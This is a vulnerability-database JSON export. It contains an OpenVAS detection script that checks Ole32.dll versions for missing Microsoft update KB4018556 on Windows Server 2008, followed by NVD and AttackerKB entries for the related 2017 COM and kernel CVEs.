{"id": "OPENVAS:1361412562310811118", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft COM Multiple Vulnerabilities (KB4018556)", "description": "This host is missing an important security\n update according to Microsoft KB4018556", "published": "2017-05-10T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811118", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-gb/help/4018556"], "cvelist": ["CVE-2017-0244", "CVE-2017-0214", "CVE-2017-0258", "CVE-2017-0213"], "lastseen": "2020-06-08T23:19:54", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0366", "CPAI-2017-0369", "CPAI-2017-0379"]}, {"type": "cve", "idList": ["CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0244", "CVE-2017-0258", "CVE-2017-0259"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "githubexploit", "idList": ["FB99D0AC-3747-583A-AE7D-EE0F4E626D66"]}, {"type": "kaspersky", "idList": ["KLA11009", "KLA11077"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0213", "MS:CVE-2017-0214", "MS:CVE-2017-0244", "MS:CVE-2017-0258"]}, {"type": "mskb", "idList": ["KB4018556", "KB4466388"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786826"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-MAY_4019214.NASL", "SMB_NT_MS17_MAY_4016871.NASL", "SMB_NT_MS17_MAY_4019215.NASL", "SMB_NT_MS17_MAY_4019264.NASL", "SMB_NT_MS17_MAY_4019472.NASL", "SMB_NT_MS17_MAY_4019473.NASL", "SMB_NT_MS17_MAY_4019474.NASL", "SMB_NT_MS17_MAY_WIN2008.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811107", "OPENVAS:1361412562310811108", "OPENVAS:1361412562310811110", "OPENVAS:1361412562310811111", 
"OPENVAS:1361412562310811112", "OPENVAS:1361412562310811113", "OPENVAS:1361412562310811114"]}, {"type": "seebug", "idList": ["SSV:96267"]}, {"type": "symantec", "idList": ["SMNTC-98102", "SMNTC-98103", "SMNTC-98109", "SMNTC-98112"]}, {"type": "threatpost", "idList": ["THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "THREATPOST:3649750E149C0B00551806E47C047B39"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27776", "1337DAY-ID-27797", "1337DAY-ID-27798"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0366", "CPAI-2017-0369", "CPAI-2017-0379"]}, {"type": "cve", "idList": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0244", "CVE-2017-0258"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "githubexploit", "idList": ["FB99D0AC-3747-583A-AE7D-EE0F4E626D66"]}, {"type": "kaspersky", "idList": ["KLA11009"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0213", "MS:CVE-2017-0214", "MS:CVE-2017-0244", "MS:CVE-2017-0258"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786826"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_MAY_4019264.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811107", "OPENVAS:1361412562310811108", "OPENVAS:1361412562310811110", "OPENVAS:1361412562310811111", "OPENVAS:1361412562310811112", "OPENVAS:1361412562310811113", "OPENVAS:1361412562310811114"]}, {"type": "seebug", "idList": ["SSV:96267"]}, {"type": "symantec", "idList": ["SMNTC-98109"]}, {"type": "threatpost", "idList": ["THREATPOST:22AA852BEEA43B18D4341D7ADA922536"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27797"]}]}, "exploitation": null, "vulnersScore": 0.2}, "pluginID": "1361412562310811118", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft COM Multiple Vulnerabilities (KB4018556)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811118\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0244\", \"CVE-2017-0258\");\n script_bugtraq_id(98112, 98109, 98103, 98102);\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:51:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft COM Multiple Vulnerabilities (KB4018556)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018556\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on 
the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The Windows kernel improperly initializes objects in memory.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - Windows fails to properly validate input before loading type libraries.\n\n - An unspecified error in Windows COM Aggregate Marshaler.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited the\n vulnerability can elevate their privilege level, can lead to denial of\n service condition, could obtain information to further compromise the users\n system and run arbitrary code with elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018556\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19773\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19773\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = 
\"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "naslFamily": "Windows : Microsoft Bulletins", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850}}
{"attackerkb": [{"lastseen": "2022-07-21T02:03:43", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \u201cWindows COM Elevation of Privilege Vulnerability\u201d. This CVE ID is unique from CVE-2017-0214.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2021-07-27T00:00:00", "id": "AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "href": "https://attackerkb.com/topics/1PgDqHxZcV/cve-2017-0213", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:50:36", "description": "Windows COM in Microsoft Windows Server 2008 SP2 and 
R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when Windows fails to properly validate input before loading type libraries, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0213.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0214", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0214", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:35", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". 
This CVE ID is unique from CVE-2017-0214.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0213", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:03", "description": "The kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows locally authenticated attackers to gain privileges via a crafted application, or in Windows 7 for x64-based systems, cause denial of service, aka \"Windows Kernel Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0244", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", 
"cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0244", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:58", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0220, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0175", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2018-10-30T16:28:00", "cpe": 
["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0175", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:42", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, and Windows Server 2012 Gold allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0220", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": 
["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0220", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:15", "description": "The Windows kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0258", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0258", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:18", "description": "The Windows kernel in Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and 
CVE-2017-0258.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0259", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-0259", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0259", "cvss": {"score": 1.9, "vector": 